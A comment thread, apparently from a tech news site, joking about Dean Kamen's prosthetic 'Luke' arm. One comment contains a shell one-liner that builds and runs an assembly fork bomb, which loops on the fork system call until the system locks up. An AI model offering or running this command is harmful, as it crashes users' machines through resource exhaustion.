Huge Leap Forward In Robotic Limb Replacement
BlueshiftVFX sends us to Wired for some video of the impressive, mind-controlled prosthetic robot arm invented by Dean Kamen. "Kamen's arm, dubbed 'Luke' (after Skywalker, I assume), is an incredibly sophisticated bit of engineering that's lightyears ahead of the clamping 'claws' that many amputees are forced to use today. The arm is fully articulated, giving the user the same degrees of movement as a natural arm, and is sensitive enough to pick up a piece of paper, a wineglass, or even a grape without mishap."
Not only would they be "fully articulated" in the bedroom they would also be "sensitive enough" to pick up flowers & wine beforehand.
Careful What You Wish For....
Dean Kamen is Finally Back to Inventing Useful Things
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You're not supposed to RTFA before you post. It could have been from Cool Hand Luke.
"What we've got here is a failure to communicate."
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
not named for skywalker, it longs for freedom even as its ordered to dig and fill a hole again and again and wins egg eating contests.
This issue was very thoughtfully covered in Strong Bad Email 47.
How many lightyears until we can see these things in stores?
Artificial limbs won't truly be kick-ass until they're better than the organic limbs they replace. And they need to make that reverb sproinging sound whenever they do something cool.
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